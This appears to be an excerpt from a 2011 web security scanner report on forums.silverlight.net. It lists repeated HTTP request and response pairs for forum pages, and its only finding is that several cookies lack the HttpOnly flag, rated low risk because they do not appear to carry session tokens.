GET /forums/p/217709/518306.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 27094 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:33 GMT; expires=Sun, 29-Jan-2012 23:19:33 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:33 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217710/518307.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 25483 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217719/518310.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 29785 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:10 GMT; expires=Sun, 29-Jan-2012 23:19:10 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:10 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217724/518300.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 25057 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:24 GMT; expires=Sun, 29-Jan-2012 23:20:24 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:24 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217726/518308.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 23439 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/p/217727/518309.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 23148 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:17 GMT; expires=Sun, 29-Jan-2012 23:19:17 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:17 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217026.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 107388 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:06 GMT; expires=Sun, 29-Jan-2012 23:19:06 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:06 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217498.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 58442 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:53 GMT; expires=Sun, 29-Jan-2012 23:18:53 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:53 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217562.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 31566 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:54 GMT; expires=Sun, 29-Jan-2012 23:18:54 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:56 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217667.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 31813 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217709.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 27069 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217710.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 25458 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217719.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 29760 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217724.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 25032 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:19:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217726.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 23414 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:50 GMT; expires=Sun, 29-Jan-2012 23:18:50 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/t/217727.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 23123 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:18:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:42 GMT; expires=Sun, 29-Jan-2012 23:20:42 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
